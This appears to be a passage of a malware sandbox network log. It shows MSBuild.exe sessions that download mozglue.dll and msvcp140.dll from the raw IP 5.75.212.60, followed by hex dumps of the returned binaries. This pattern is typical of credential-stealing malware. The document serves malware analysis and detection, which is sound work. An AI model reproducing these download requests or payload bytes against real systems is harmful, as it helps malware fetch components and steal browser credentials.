2024-07-26 16:56:23 UTC	16384	IN	Data Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
2024-07-26 16:56:23 UTC	16384	IN	Data Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49747	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:24 UTC	241	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:25 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:24 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Friday, 26-Jul-2024 16:56:24 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 16:56:25 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-07-26 16:56:25 UTC	16384	IN	Data Raw: 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPF
2024-07-26 16:56:25 UTC	16384	IN	Data Raw: 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-07-26 16:56:25 UTC	16384	IN	Data Raw: c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-07-26 16:56:25 UTC	16384	IN	Data Raw: 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-07-26 16:56:25 UTC	16384	IN	Data Raw: ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc Data Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-07-26 16:56:25 UTC	16384	IN	Data Raw: 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-07-26 16:56:25 UTC	16384	IN	Data Raw: 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
2024-07-26 16:56:25 UTC	16384	IN	Data Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-07-26 16:56:25 UTC	16384	IN	Data Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:26 UTC	242	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:26 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:26 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Friday, 26-Jul-2024 16:56:26 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 16:56:26 UTC	16124	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-07-26 16:56:26 UTC	16384	IN	Data Raw: 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr
2024-07-26 16:56:26 UTC	16384	IN	Data Raw: 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-07-26 16:56:26 UTC	16384	IN	Data Raw: 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-07-26 16:56:26 UTC	16384	IN	Data Raw: 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-07-26 16:56:26 UTC	16384	IN	Data Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
2024-07-26 16:56:26 UTC	16384	IN	Data Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
2024-07-26 16:56:26 UTC	16384	IN	Data Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
